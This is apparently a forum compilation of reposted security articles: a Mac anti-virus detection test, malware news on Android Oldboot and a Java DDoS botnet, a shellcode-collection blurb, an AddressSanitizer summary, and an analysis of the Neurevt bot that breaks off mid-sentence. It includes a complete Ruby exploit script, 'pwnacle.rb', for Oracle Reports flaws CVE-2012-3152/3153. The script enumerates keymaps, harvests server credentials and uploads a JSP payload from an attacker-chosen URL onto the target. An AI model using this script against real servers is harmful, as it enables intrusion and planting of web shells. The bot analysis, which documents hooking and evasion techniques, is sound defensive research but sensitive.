and FOXACID Articles about attacks on the blog Tor Conclusion This blog was just a fun exercise in anonymity, although I might use it to post some things in the future. I am just using the tools built by people much smarter than me, and I’m certainly not the first anonymous blogger, but I hope you learned something new. Of course, the rabbit hole can go much deeper than this. I could have hosted this blog on a VPS that I rented with Bitcoins, and set up the server as a Tor hidden service. The server’s IP address would be fully protected, but then you could have only read the blog by connecting to the Tor network, and onion links just don’t make it to the front page. I could have also done all my activities from a coffee shop, just in case Tor was compromised, but I couldn’t be fucked. Finally, I could have chosen an “.se” domain if I was scared about U.S. government intervention. That’s what The Pirate Bay is using now, and the Swedes are just letting them do their thing. Please feel free to send me some spare Satoshis if you enjoyed the post: 146g3vSB64KxxnjWbb2vnjeaom6WYevcQb. And if you can find me, I’ll be very impressed. Sursa: Untraceable
-
Mac anti-virus testing 2014 Posted on January 27th, 2014 at 8:49 AM EST Almost exactly one year ago, I completed a round of tests of 20 different anti-virus programs on the Mac. Because this is an area of software that is in almost constant flux, I felt it was important to repeat that test this year. I was very curious about whether these programs were still as effective (or ineffective) as they had been, and how well they detected new malware that had appeared since the last test was performed. After last year’s testing, I received a number of requests for tests of other apps. This year’s testing sees a change in some of the apps being tested. Four new apps were added, while two were removed from testing (one simply because it was redundant). The malware samples used also went through a change. Some samples were removed, in an attempt to remove any that might have been deemed questionable, while others were added. Multiple samples of each of nine new malicious programs, which did not exist at the time of last year’s testing, were included. Scope As with last year, it’s important to understand the scope of this testing. This test is a measure only of the detection of specific malware samples when performing a manual scan. It makes no attempt to quantify the performance or stability of the various anti-virus apps, or to compare feature sets, or to identify how well an anti-virus app would block an active infection attempt. In a way, this test is merely a probe to see what items are included in the database of signatures recognized by each anti-virus app. The success of an app in this testing should not be taken as endorsement of that app, and in fact, some apps that performed well appear to have anecdotal problems that frequently appear in online forums. It is also important to understand small variations in the numbers. Some of the software that was tested varied from each other, or from last year’s testing, by only a couple percentage points. It’s important to understand that such a variation is not significant. A 98% and a 97%, or a 60% and a 59%, should be considered identical, for all intents and purposes. Methods Testing methodology was mostly the same as last year. A group of 188 samples, from 39 different malware families, was used for testing. Any samples that were not already present in the VirusTotal database were uploaded to VirusTotal, so that the samples would be available to the anti-virus community. The SHA1 checksum of each sample is included in the data, to allow those with access to VirusTotal to download the samples used and replicate my tests. Where possible, the full, original malware was included in testing. In many cases, such a sample will be found within a .zip or .dmg archive on VirusTotal, but such samples were not included in that form. All items were removed from their archives, and the archives were discarded, in order to put all anti-virus engines on a level playing field. (Some will check inside such archives and some will not.) In a number of cases, I have not been able to obtain full copies of the malware, but included executable components and the like. Testing was done in virtual machines in Parallels Desktop 9.0.24172.951362. I started with a virtual machine (VM) that consisted of a clean Mac OS X 10.9.1 installation, with Chrome and Firefox also installed. A snapshot of this system was made, and then this VM was used as the basis for all testing. I installed each anti-virus app (engine) in that VM, saved a snapshot, reverted to the original base VM and repeated. Once installations were done, I ran each VM and updated the virus definitions in each anti-virus app (where possible), then saved another snapshot of this state and deleted the previous one. The end result was a series of VMs, each containing a fully up-to-date anti-virus app, frozen at some time on January 16. After that point, testing began. Testing took multiple days, but with the network connection cut off, the clock in the virtual system remained set to January 16, shortly after the anti-virus software was updated, and further background updates were not possible. Malware was copied onto the system inside an encrypted .zip file (to prevent accidental detection), which was then expanded into a folder full of samples. Each anti-virus app had any real-time or on-access scanning disabled, to prevent premature detection of malware. If an error was made, and malware was detected and quarantined in the process of expanding the archive, the VM was reset, settings in the anti-virus app were changed, and the process repeated. Once the malware was in place, scans commenced. Each app was used to scan that folder, or if custom scans were not allowed, a scan was done that would include the test user’s home folder, where the malware samples resided. Results were collected, in most cases in a very inconvenient manner. A few of the anti-virus apps allowed me to save or retrieve a log that contained information about what was detected, but most did not. In most cases, I was only able to capture the data by paging through a list of detected malware and taking a series of screenshots. Once collection of the data was done, a post-scan snapshot of the VM was saved, so that the results could be reviewed later as necessary. After the data was collected, the painstaking process of tabulating it began. Data was entered in a Numbers spreadsheet. A great deal of care was taken to ensure that no errors were made, but when tabulating data of this nature (trying to match up 64-digit hexadecimal numbers), it is entirely possible that transcription errors ended up in the data. Any errors brought to my attention will be immediately corrected. Data The complete data can be downloaded as either a Numbers spreadsheet or a PDF file. (An Excel file was not provided because some of the formatting that made the data more readable did not make the conversion well.) Detection rates (defined as the percentage of samples that were detected) varied widely, from 98% down to 0%. Only 9 anti-virus engines tested performed at 91% or better, and around 2/3 of the engines got a “passing grade” (72% and up). Nine performed at 60% or lower. Five did so poorly – between 12% and no detections at all – that I would consider them to be scams. [TABLE=class: alternatingRows, width: 100%] [TR] [TD][/TD] [TD]Samples detected[/TD] [TD]Percentage detected[/TD] [/TR] [TR] [TD]VirusBarrier 10.7.8 (772)[/TD] [TD]187[/TD] [TD]99%[/TD] [/TR] [TR] [TD]avast! Free Antivirus 8.0 (40005)[/TD] [TD]184[/TD] [TD]98%[/TD] [/TR] [TR] [TD]ESET Cybersecurity 5.0.115.0[/TD] [TD]182[/TD] [TD]97%[/TD] [/TR] [TR] [TD]Sophos Anti-Virus for Mac 9.0.6[/TD] [TD]182[/TD] [TD]97%[/TD] [/TR] [TR] [TD]Avira Mac Security 2.0.1.105[/TD] [TD]181[/TD] [TD]96%[/TD] [/TR] [TR] [TD]F-Secure Anti-virus for Mac 0.1.?[/TD] [TD]181[/TD] [TD]96%[/TD] [/TR] [TR] [TD]Dr. Web Light 6.0.6 (201207050)*[/TD] [TD]179[/TD] [TD]95%[/TD] [/TR] [TR] [TD]Kaspersky Security 14.0.1.46[/TD] [TD]177[/TD] [TD]94%[/TD] [/TR] [TR] [TD]Comodo Antivirus 1.1.214829.106*[/TD] [TD]172[/TD] [TD]91%[/TD] [/TR] [TR] [TD]WebRoot SecureAnywhere 8.0.5.82: 134[/TD] [TD]162[/TD] [TD]86%[/TD] [/TR] [TR] [TD]Norton Anti-Virus 12.6 (26)[/TD] [TD]158[/TD] [TD]84%[/TD] [/TR] [TR] [TD]BitDefender 2.21 (2.21.4959)*[/TD] [TD]143[/TD] [TD]76%[/TD] [/TR] [TR] [TD]ClamXav 2.6.1 (304)[/TD] [TD]136[/TD] [TD]72%[/TD] [/TR] [TR] [TD]AVG AntiVirus 14.0 (4172)[/TD] [TD]115[/TD] [TD]61%[/TD] [/TR] [TR] [TD]Trend Micro Titanium 2.0.1279[/TD] [TD]112[/TD] [TD]60%[/TD] [/TR] [TR] [TD]ProtectMac 1.4[/TD] [TD]107[/TD] [TD]57%[/TD] [/TR] [TR] [TD]McAfee Endpoint Protection for Mac 2.1.0 (1085)[/TD] [TD]99[/TD] [TD]53%[/TD] [/TR] [TR] [TD]FortiClient 5.0.7.135[/TD] [TD]22[/TD] [TD]12%[/TD] [/TR] [TR] [TD]iAntivirus 1.1.4 (282)[/TD] [TD]19[/TD] [TD]10%[/TD] [/TR] [TR] [TD]MacScan 2.9.4*[/TD] [TD]4[/TD] [TD]2%[/TD] [/TR] [TR] [TD]Magician Anti-Trojan 1.4.8[/TD] [TD]1[/TD] [TD]1%[/TD] [/TR] [TR] [TD]MaxSecureAntivirus 1.0.1 (1.0.1)[/TD] [TD]0[/TD] [TD]0%[/TD] [/TR] [/TABLE] (* The version of anti-virus apps marked with an asterisk did not change since last year’s testing, though of course this has no bearing on signature database updates.) Last year, detections were broken down into active and inactive malware. I decided not to do that this year, as in some cases, the decision about whether to identify a particular piece of malware as active or inactive is difficult to make. Instead, I listed the year the malware family first appeared, and sorted the results by that year. In general, most malware that appeared in 2011 and earlier is inactive at this point, while a significant portion of malware newer than that is probably still active. Exploit.OSX.Safari Detection rates of each sample varied widely, with an average of 14 engines detecting each sample. One sample was detected by only 6 anti-virus engines, and three samples (all copies of Exploit.OSX.Safari) were only detected by one engine. These were included nonetheless because I know that they are malware. Strangely, in the case of the three Exploit.OSX.Safari samples, the malware is detected at a much greater rate when a .zip file containing the sample is scanned! The rate drops off to almost zero when the actual malicious file itself – a shell script disguised as a QuickTime movie – is scanned, both in my own testing and on VirusTotal. Conclusions Although it is important to keep in mind that this is only one measure of the quality of each of the tested anti-virus engines, it is not an unimportant one. Obviously, although it is not feasible for any anti-virus software to detect 100% of all malware, a good engine should be capable of coming as close to that number as possible. This is especially true in the Mac world, where the limited number of malware families means that detection rates of very close to 100% should be possible. As expected, some engines did indeed perform to that standard. Other engines did not fare so well. However, it is important to keep in mind that Mac OS X already does an admirable job of protecting against malware. At this time, there is no known malware capable of infecting a Mac running a properly-updated version of Mac OS X 10.6 or later, with all security settings left at the default (at a minimum). The role of anti-virus software must be taken into consideration, and some compromises in detection rate may be desirable to get desired behavior (or avoid bad behavior). Someone who wants a low-impact engine for scanning e-mail messages for Windows viruses will have very different needs than someone who needs to protect a computer from an irresponsible teenager who will download and install anything that catches his/her attention. It should also be noted that this test says nothing whatsoever about detection rates of Windows or Android malware. An engine that performs well against Mac malware may do quite poorly on malware for other systems, and likewise, one that does poorly with Mac malware may be very good with other malware. If your primary goal is to use anti-virus software to catch malware for other systems, so as to avoid passing it on, then this testing is not particularly relevant. When choosing anti-virus software, always take the full set of features into account, as well as seeking out community feedback regarding stability and performance. Be sure that you know how to uninstall the software before installing it, in case it causes problems and needs to be removed. If you should need to remove anti-virus software, always use the uninstaller provided with the software. Do not use generalized uninstall apps that claim to be able to find and remove all components of any application; such apps are unreliable. For more on the topic of protecting your Mac against malware, see my Mac Malware Guide. Objections There are a few objections that some may have with this test, so allow me to address them in advance. First, some will object that this is a rather artificial test, and not a real-world one. Although it would obviously be better to test by trying to infect a system with a variety of malware and determining whether each anti-virus software would block the infection, this is impractical. Not only would it be exceedingly time consuming with only a few samples, but it would be fairly meaningless as well, since Mac OS X is currently able to block all known malware through a variety of methods. Testing with static samples may be less informative, but it does give valuable information about the completeness of each engine’s virus definitions database. The sample size has improved significantly since earlier testing, consisting of 188 samples. Of course, this is still a very small sample size compared to Windows anti-virus testing, in which case many hundreds or thousands of samples would be used. Of course, taking into consideration the fact that there are millions of malware samples to be had in the Windows world, and very few in the Mac world, 188 samples is probably a more statistically significant number than what is used for most Windows-based tests. My opinion is that the samples used are a pretty good selection of Mac malware. A few of the engines tested appear to be enterprise-oriented programs. (In other words, they are aimed at being installed on large numbers of computers by large companies.) I chose to include these anyway, even though some people object to comparison of enterprise- and consumer-level anti-virus products. There are a number of end users who may be using one of these enterprise products on a company machine, and who are curious how well it detects Mac malware, and it is important to keep in mind that these tests do not represent a direct comparison between the engines being tested, but rather are a test against a particular standard: which samples are and are not detected. Finally, some may object to the fact that more than half of the samples are what would be considered “extinct” malware, since such samples are no longer a real threat to anyone. However, information about what malware has been detected historically by an anti-virus engine is important for predicting future accuracy. In fact, looking at the data, there is no apparent increase in detection rate with newer malware. There’s also the fact that some people may be looking for anti-virus software for old, legacy systems that may have malware infections from years past still in place. After all, Intego recently revealed that there are still at least 22,000 Macs infected with the extinct Flashback malware. Anti-virus Engine Notes There were a number of important or interesting points to make about specific anti-virus engines. AVG had no way that I could determine to manually update its malware signatures. I simply allowed the VM containing AVG to run unattended for a while on January 16th, in an attempt to ensure the signatures were up-to-date. However, since there also is no apparent way to get information about the version of the signature database, I’m uncertain as to whether this strategy was successful. The author of ClamXav is temporarily unable to add malware signatures to the official ClamAV signature database, but is working on a version of ClamXav that can download Mac-specific signatures separately. Once this is done, ClamXav detections should be able to get back on track again. Comodo‘s installer was identified as being from an unidentified developer, due to not being code signed with a valid Apple Developer ID, and thus was blocked by Gatekeeper. This is a very serious failing on the part of a security app, in my opinion. I was forced to bypass Gatekeeper in order to install the program. iAntivirus apparently does not feature any kind of mechanism for updating its definitions. (This is confirmed by a Symantec employee in the Norton forums.) I am unsure of the exact age of the current version of iAntivirus (version 1.1.4), but the comments people have made about this version in the Mac App Store date back to April 15, 2013, meaning that the malware signatures are at a minimum nine months old! MacKeeper was removed from testing. It is an app that I actively recommend against using, but its anti-virus “back end” is an engine that performs well in my testing. I did not want to seem to give legitimacy to the program when I am strongly opposed to its use. Magician is an app very similar to MacKeeper, and appears to be of similar quality, since it only detected one single sample. I strongly advise against its use in any capacity. MaxSecureAntivirus detected absolutely none of the samples. It was the only app I was forced to purchase (for $10) in order to test. Apple has given me a refund, and is reviewing the app at this time. It is my hope that it is removed from the App Store, as it is a complete and utter scam, in my opinion. Norton‘s performance was absolutely abysmal, even considering the limited capabilities performance-wise of the VM it was running in. Nearly every action, including mounting a USB flash drive containing the malware in the Finder, took far longer than it did with any of the other VMs used in testing. VirusBarrier Express was removed from testing due to redundancy. It should have the same detections as VirusBarrier, so I chose not to test it. Updates January 28, 2014: 5 samples were inadvertently included as .jar archive files. These files were decompressed and re-scanned with all engines that missed them the first time around. There were very few changes. Only VirusBarrier, AVG and iAntivirus results changed. Revision 2 of the data files is now available at the original links given in the Data section. Sursa: The Safe Mac
-
Shellcodecs is a collection of shellcode, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process. Contents 1 Dependencies 2 Contents 3 Download shellcodecs 4 Building the code 5 Using the tools 5.1 Generators 5.1.1 Standard shellcode generator 5.1.2 Socket re-use shellcode generator [*]5.2 Loaders [*]6 Getting help [*]7 Credits Dependencies In order to run these shellcodes, the following dependencies are required: Linux GCC Generators require Python 2.7 Automake Unless otherwise noted, code is amd64. There are various 32-bit examples as well. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the shellcode appendix. Link: Shellcodecs - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
-
AddressSanitizer AddressSanitizer: a fast memory error detector Updated Oct 16, 2013 by samso...@google.com Introduction Getting AddressSanitizer Using AddressSanitizer Interaction with other tools gdb ulimit -v [*]Flags [*]Call stack [*]Incompatibility [*]Turning off instrumentation [*]FAQ [*]Comments? New: AddressSanitizer is released as part of LLVM 3.1. New: Watch the presentation from the LLVM Developer's meeting (Nov 18, 2011): , slides. New: Read the USENIX ATC '2012 paper. Introduction AddressSanitizer (aka ASan) is a memory error detector for C/C++. It finds: Use after free (dangling pointer dereference) Heap buffer overflow Stack buffer overflow Global buffer overflow Use after return Initialization order bugs This tool is very fast. The average slowdown of the instrumented program is ~2x (see PerformanceNumbers). The tool consists of a compiler instrumentation module (currently, an LLVM pass) and a run-time library which replaces the malloc function. The tool works on x86 Linux and Mac. See also: AddressSanitizerAlgorithm -- if you are curious how it works. ComparisonOfMemoryTools Sursa: https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer
-
Android bootkit malware infects more than 350,000 Android devices Graham Cluley | January 29, 2014 8:46 am Experts at Russian security firm Dr Web have issued a warning about a dangerous Trojan horse affecting more than 350,000 Android users. What makes this malware attack unusual is that it is designed to reinstall itself after you reboot your Android device, even if you have deleted all of its working components, reinfecting the system. Dr Web has dubbed the malware Android.Oldboot, and report that it can download, install and remove applications on infected Android devices, opening opportunities for hackers to gain control and make money from the hundreds of thousands of Android devices already infected. And, according to the researchers, it appears that the devices most at risk are those which have been reflashed with modified firmware (it’s not unusual for Android owners to root their devices and install customised versions of the operating system onto their smartphones). Reflashing a device with modified firmware that contains the routines required for the Trojan’s operation is the most likely way this threat is introduced. Over 90% of the infected devices determined by the Dr Web researchers are based in China (the malware’s apparent target), but there are also reports of infections amongst Android users in Spain, Italy, Germany, Russia, Brazil, the United States and some South East Asian countries. Android malware is a growing problem, and as more criminals try to earn money by exploiting Android devices we can expect to see more and more sophisticated attacks. Clearly it’s important for those Android users who are reflashing and rooting their devices to exercise caution over where they get they download their homebrewed alternative versions of the operating system, as it’s possible it could be harbouring malware. And, realise this. If you’re not yet running anti-virus software on your Android device, you are playing an increasingly dangerous game. Sursa: Android bootkit malware infects more than 350,000 Android devices
-
Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices Multi-platform threat exploits old Java flaw, gains persistence. by Dan Goodin - Jan 28 2014, 6:00pm EST Researchers have uncovered a piece of botnet malware that is capable of infecting computers running Windows, Mac OS X, and Linux that have Oracle's Java software framework installed. The cross-platform HEUR Backdoor.Java.Agent.a, as reported in a blog post published Tuesday by Kaspersky Lab, takes hold of computers by exploiting CVE-2013-2465, a critical Java vulnerability that Oracle patched in June. The security bug is present on Java 7 u21 and earlier. Once the bot has infected a computer, it copies itself to the autostart directory of its respective platform to ensure it runs whenever the machine is turned on. Compromised computers then report to an Internet relay chat channel that acts as a command and control server. The botnet is designed to conduct distributed denial-of-service attacks on targets of the attackers' choice. Commands issued in the IRC channel allow the attackers to specify the IP address, port number, intensity, and duration of attacks. The malware is written entirely in Java, allowing it to run on Windows OS X and Linux machines. For added flexibility, the bot incorporates PircBot, an IRC programming interface based on Java. The malware also uses the Zelix Klassmaster obfuscator to prevent it from being reverse engineered by whitehat and competing blackhat hackers. Besides obfuscating bytecode, Zelix encrypts some of the inner workings of the malware. Sursa: Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices | Ars Technica
-
Automated exploit for CVE-2012-3152 / CVE-2012-3153 by Mekanismen #!/usr/bin/env ruby require 'uri' require 'open-uri' require 'openssl' #OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE def upload_payload(dest) url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'" #print url begin uri = URI.parse(url) html = uri.open.read rescue html = "" end if html =~ /Successfully run/ @hacked = true print "[+] Payload uploaded!\n" else print "[-] Payload uploaded failed\n" end end def getenv(server, authid) print "[+] Found server: #{server}\n" print "[+] Found credentials: #{authid}\n" print " [*] Querying showenv ... \n" begin uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}") html = uri.open.read rescue html = "" end if html =~ /\/(.*)\/showenv/ print "[+] Query succeeded, uploading payload ... \n" upload_payload($1) else print "[-] Query failed... \n" end end @payload_url = "" #the url that holds our payload (we can execute .jsp on the server) @url = "" #url to compromise @hacked = false @payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp" print " [*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n" print " [*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n" print " [*] Credits to: @miss_sudo\n" unless ARGV[0] and ARGV[1] print "[-] Usage: ./pwnacle.rb target_url payload_url\n" exit end @url = ARGV[0] @payload_url = ARGV[1] print " [*] Target URL: #{@url}\n" print " [*] Payload URL: #{@payload_url}\n" print " [*] Payload name: #{@payload_name}\n" begin #Can we view keymaps? uri = URI.parse("#{@url}/reports/rwservlet/showmap") html = uri.open.read rescue print "[-] URL not vulnerable or unreachable\n" exit end test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten #Parse keymaps for servers print " [*] Enumerating keymaps ... \n" test.each do |t| if not @hacked t = t.delete(' ') url = "#{@url}/reports/rwservlet/parsequery?#{t}" begin uri = URI.parse(url) html = uri.open.read rescue end #to automate exploitation we need to query showenv for a local path #we need a server id and creds for this, we enumerate the keymaps and hope for the best #showenv tells us the local PATH of /reports/ where we upload the shell #so we can reach it from /reports/images/<shell>.jsp if html =~ /userid=(.*)@/ authid = $1 end if html =~ /server=(\S*)/ server = $1 end if server and authid getenv(server, authid) end else break end end if @hacked print " [*] Server hopefully compromised!\n" print " [*] Payload url: #{@url}/reports/images/#{@payload_name}\n" else print " [*] Enumeration done ... no vulnerable keymaps for automatic explotation found \n" #server is still vulnerable but cannot be automatically exploited ... i guess end Sursa: https://github.com/Mekanismen/pwnacle-fusion/blob/master/pwnacle.rb
-
NEUREVT Bot Analysis by Zhongchun Huo | January 29, 2014 This article originally appeared in Virus Bulletin Neurevt (also known as Beta Bot) is an HTTP bot 1 which entered the underground market around March 2013 and which is priced relatively cheaply 2. Though still in its testing phase, the bot already has a lot of functionalities along with an extendable and flexible infrastructure. Upon installation, the bot injects itself into almost all user processes to take over the whole system. Moreover, it utilizes a mechanism that makes use of Windows messages and the registry to coordinate those injected codes. The bot communicates with its C&C server through HTTP requests. Different parts of the communication data are encrypted (mostly with RC4) separately. In this article, we will take a detailed look at this bot’s infrastructure, communication protocol and encryption schemes. (This analysis is based on samples that were collected from March to June 2013.) Installation/Deployment Installation Process Just like most malware, the installation of Neurevt starts with it copying itself to a system folder. The folder is selected according to the machine’s characteristics such as the version of Windows, the service pack installed, and whether the OS is 64-bit. For example, on an x86 machine running Windows XP SP2, the chosen folder is %PROGRAM FILES%\ COMMON FILES. The installer creates a sub-folder named ‘winlogon.{2227A280-3AEA-1069-A2DE- 08002B30309D}’. The first part of the folder name, ‘winlogon’, is obtained from the configuration of the bot, and the second part is a special GUID which makes the folder link to the ‘Printers and Faxes’ folder in Windows Explorer. This folder will act as the launching point each time the malware restarts. The installer then launches the new file and exits. The newly launched copy creates a process of a system application, which also varies under different circumstances, and starts to inject. The injected data is within a continuous block of memory and has the following data layout: Since this is the first time the malware has injected something into another process, the injected content runs as an independent application. I refer to it as the primary instance’ to distinguish it from other instances that are injected into other processes. The primary instance searches for all running processes, and injects into those that fulfill the following conditions: This time, the injected data has the same layout as the primary instance. The only difference is in the ‘local cfg’ part - in which some data fields are modified to act differently since some components should be loaded in the primary instance only. After injection, there should be one instance of the malware in every running user process. I refer to these as ‘assistant instances’. There is code in every assistant instance that monitors the status of the primary instance. Once, for whatever reason, the primary instance exits, the assistant instance will attempt to restart the malware from its launch point. After the malware has finished its deployment, the primary instance will start to communicate with the C&C server. The whole process looks like a traditional virus infecting a file system, but instead of infecting files, the malware infects running processes. Gather local information The first flag contains information about the Windows version, installed service pack, and whether the OS is 32- or 64-bit. The second flag contains information about the following software or vendors: .Net Framework, Java, Steam, SysInternal tools, mIRC, Hex-Rays, Immunity Inc., CodeBlocks, 7-Zip, PrestoSoft, Nmap, Perl, Visual Studio and Wireshark. It also contains information that indicates if the system: 1) Has battery 2) Has RDP records 3) Has UAC enabled. The fourth flag contains information about installed AV software: Symantec, AVP, AVG, Avira, ESET, McAfee, Trend Micro, Avast, Microsoft Security Client, Bitdefender, BullGuard, Rising, Arcabit, Webroot, Emsisoft, F-Secure, Panda, PC Tools Internet Security and G Data AntiVirus. Component thread The malware creates threads to perform different kinds of jobs, such as communicating with the C&C server, checking data consistency, managing messages passing among threads (components), or monitoring and infecting USB drives. These threads are like software components. In order to load the threads properly, the malware defines a function to create them. The following is the function’s definition: ThreadProc is the routine that performs a particular job, while idx is the index assigned to it by the malware. 0-0x1E and 0x21 are idx values given to those unique routines for which there should be only one running thread. 0x1F and 0x20 are for multiple instance routines. If the NewComponentThread is called with idx set to these two values, the function will assign a new idx to ThreadProc, which is the first available (unassigned) number from 0x22. The malware maintains a list to keep track of all the threads that are created by the function. Each ThreadProc takes an entry pointed to by its idx. The entry of the list has the following structure: Before actually starting the new ‘component thread’, NewComponentThread adds a short code stub and a wrapper function to ThreadProc. The code stub will be written into ntdll’s image, at a random location within the MZ header. This random location will serve as the StartAddress when NewComponentThread calls CreateThread. So, the start address of the ‘component thread’ is within the memory range of ntdll’s image. This feature is used when the malware passes messages among its threads. The wrapper function attempts to hide the thread from debuggers and updates the thread list before and after it calls ThreadProc. It also sets a specific TLS slot with a specific value, 1234. Since the malware’s code is always running in an injected process, the API hook will be applied to monitor and manipulate the behavior of the host process. The specific TLS slot value is used to identify the malware’s own threads for which the API hook should not be applied. API hook The malware applies the Ring 3 hook in two ways. First, the malware adds a pre-operation filter for each of the following Zw* APIs: ZwCreateFile ZwOpenFile ZwDeleteFile ZwSetInformationFile ZwQueryDirectoryFile ZwCreateKey ZwOpenKey ZwSetValueKey ZwOpenProcess ZwTerminateProcess ZwCreateThread ZwCreateThreadEx ZwResumeThread ZwSuspendThread ZwSetContextThread ZwOpenThread ZwUnmapViewOfSection ZwDeviceIoControlFile ZwQueueApcThread The filter first checks the specified TLS slot. If its value is 1234, this means that the calling thread belongs to the malware. The filter will do nothing and let the thread call the real API. If the TLS slot is not 1234, the filter examines the object (process, thread, file, registry) on which operation will be performed, if the object belongs to the malware, then the filter will return an error status to the calling thread. The second way it applies the Ring 3 hook is by applying an inline hook on the following two groups of APIs: 1) getaddrinfo, GetAddrInfoW, DnsQuery_W 2) HttpSendRequestW, PR_Write The malware hooks APIs in group 1 to block unwanted hosts. The host list is received from the bot server. Most of the unwanted hosts are the web servers of anti-virus software vendors. The malware hooks the APIs in group 2 only if the injected process is one of the following browser processes: firefox.exe iexplore.exe chrome. The malware receives a list of URLs to be monitored from the bot server. If the browser sends requests to these URLs, the malware will capture the request data and send it back to the bot server. Handling messages There are multiple instances of the malware running in the system. To coordinate these instances, the malware creates a thread in each as a handler of application-defined messages. Most of the messages are sent from the primary instance after it has received something from the bot server to notify other instances to update their local data, such as the blocked host list and the monitored URL list mentioned earlier. If a malware’s thread is about to send a message, it enumerates all the running threads in the system, searching for those that have a start address within ntdll’s image. As described in the ‘Component thread’ section, all the threads created by NewComponentThread fulfil this condition. The sending thread will call PostThreadMessage to send the message to them. Among these threads, only the message handlers (in all the malware instances) have a message queue (by calling IsGuiThread) for messages that are not associated with any window (a feature of messages sent by PostThreadMessage). So the handlers will retrieve the message and response accordingly. Before a message is sent out, the sending thread will add a pre-defined modifier to the message identifier. This modifier is calculated based on the signature string in the bot configuration and the computer name. Its value is within the range from 0 to 31. The wParam and lParam are also modified since they often carry values with specific meanings like process id or thread id. In the handler thread, these values will be restored by a reverse calculation before the message is handled. This means that, even if the messages passing among the malware’s threads are being monitored, it’s hard to understand their meanings. The messages supported by the handler thread are listed in Table 1. Sharing data in registry Themalware stores shared data for all instances in registry values. The values will be created under the key HKCU\ Software\CLSID{random guid}{hash of configuration signature string}. The following are important values used by the malware: CS1\S02: Encrypted data that stores the last received blocked host list. CS1\S03: Encrypted data that stores the last received monitored URL list. CS1\S01: The last received configuration. CG1\CF01: Value of the DWORD at offset 0x20 in the last received response. CG1\CF02:Value of the DWORD at offset 0x24 in the last received response. CG1\CF03: Value of the DWORD at offset 0x28 in the last received response. CG1\BIS: Flag that indicates that the process is running on a removable disk. CG1\BID: The first launch time. CG1\HAL: DWORD, set to 0xEE05 after it has been installed successfully. CG1\LCT: Time of last received bot response. Bot Communication Neurevt communicates with its C&C server through HTTP. Both the request and response are encrypted with the RC4 algorithm. The communication starts as the malware on an infected machine sends its first request to the bot server. Then the communication goes on in a ‘Q & A’ manner. Bot configuration Neurevt has a built-in configuration. The configuration data and the decryption code are both encrypted with RC4. The malware allocates a block of memory on the heap, and decrypt the configuration. The argument passed to the thread is a pointer to the following structure: The fields between DecryptFunc and GetCriticalSection are functions that are used by the decryption function. First, the decryption thread will perform an integrity check by calculating the hash value of the key sequence and comparing it with a valued that is embedded in the PE image. If the hash values are consistent, the thread allocates a block of memory and decrypts the configuration data into the memory. lpKeyForReEncrypt is a pointer to a four-byte key sequence for re-encryption. It is generated randomly after the configuration data has been decrypted. The re-encryption also uses the RC4 algorithm. Its purpose is to protect the configuration data from being discovered from any memory dump. The re-encryption is done by the main thread after the decryption thread exits. Before the decryption thread exits, it stores the memory pointer and the re-encryption key in the memory block that is given by lpGlobalData. Any access to the configuration data afterwards is carried out using the following steps: 1) Allocate a block of memory and copy the re-encrypted data into it. 2) Decrypt and get the desired data. 3) Re-encrypt the data. 4) Release the memory. The configuration data has a 718-byte header, which contains the fields shown in Table 2. There is an array at 0x2ce of the configuration data. Each entry stores information about a C&C server. Normally there will be more than three entries in one configuration. The size of the entry is 0x280 bytes. The crucial fields are shown in Table 3. Request format Each request contains a 128-byte data block, which contains the fields shown in Table 4. The malware encrypts the data block with RC4. It uses a 12-byte key sequence, which is a combination of two parts. The first is an eight-byte sequence obtained from the chosen entry of the configuration data, at offset 0x26e. The second part is a random sequence obtained by calling CryptGenRandom. The length of the sequence is within a range from eight to 27 bytes. This part of the key and encrypted data block will be inserted into the query string. If it is the first request sent to the bot servers, it will also contain the following three CS fields: 1) A full file path of installed malware 2) The username in NameSamCompatible format 3) The name of the default web browser. These strings are encrypted separately with a loop-XOR algorithm and concatenated into a URL query string. Bot response header format The bot response contains a 0x5c-byte header and a body which consists of at most eight streams (only four streams are actually used). Both the header and the body are encrypted with RC4 and they will be decrypted separately. The first four bytes in the header will be appended to the eight-byte sequence in the configuration to form a 12-byte key sequence for decrypting the header. The following four bytes in the header and another eight-byte sequence in the configuration are concatenated to form another 12-byte key sequence for the response body. The response header has the structure shown in Table 5. The Control flag in the response header is a bit-flag which triggers different behaviours of the malware, such as invoking routines that disable security software or fake pop-up warning windows to trick the user into giving permission for the malware to bypass the UAC. Fields from 0x20 to 0x28 are three DWORDs which will be stored in the registry values. They will be copied to the bot server in the next request sent by the malware. The length array at 0x3C has eight entries - each denotes the length of the corresponding stream in the response body. Bot response body According to the response header format, there should be eight streams in the body, but the malware only has handling routines for the first four streams. The first stream contains bot commands sent back by the bot server. The first word of the stream is the count of the commands in the stream. Each command is stored as a null-terminated string preceded by a data block. The size of the data block is 22 bytes. It is not used in any of the malware’s code. The malware identifies the command keyword by hash value. It has a list of handling routines. Each entry in the list has the following structure: The second stream contains a list of hosts that will be blocked. The list is used in the following hooked functions: DnsQuery_W GetAddrInfoW getaddrinfo The third stream contains a list of URLs for which the malware will monitor the HTTP requests sent. The list will be used in the following hooked APIs: HttpSendRequestW PR_Write The fourth stream in the response body contains data which could be used to generate a new configuration. The stream is in a format similar to that of an INI file. The malware compiles the stream into a binary data block which is organized in a structure described in the configuration section. Spam Through Skype The malware uses Skype to spread any text material received from the bot server. There are two bot commands that will invoke the spreading job. The bot server sends the command along with a URL parameter pointing to a text file. Each line of the text file contains a locale-message pair which is delimited by a semicolon: {locale name};{spam content} The malware chooses one line according to the locale of the system’s default language and sends the message in the line to all the Skype contacts except ‘echo123’, which is the name of Skype’s echo service. To send the message, the malware creates a new process of itself with the command line parameters set to ‘/ssp {URL sent by bot 